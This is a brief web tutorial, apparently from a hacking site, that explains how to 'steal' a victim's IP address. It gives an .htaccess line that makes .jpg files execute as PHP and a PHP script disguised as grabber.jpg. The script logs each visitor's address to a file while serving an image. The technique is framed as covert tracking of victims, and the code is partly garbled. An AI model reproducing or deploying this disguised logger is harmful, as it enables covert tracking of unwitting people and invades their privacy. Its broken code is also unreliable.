How to Steal Victim IP Address

Aug 20, 2015 02:32 PM
635756527486538227.jpg

Step 1: Creating the htaccess code which will add jpg as php executable.

AddHandler application/x-httpd-php5 .jpg

Step 2: Now make a grabber.jpg file with the below code.


$fh = fopen('iplist.txt', 'a');

fwrite($fh, $
SERVER'REMOTE_ADDR'."

");

fclose($fh);

$im = imagecreatefromjpeg("kali.png");

header('Content-Type: image/jpeg');

imagejpeg($im);

imagedestroy($im);

?>

Step 3:Now in the end put a image with kali.png in the same folder and

change the permission for grabber.jpg to 755 you are ready with your ip grabber.

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!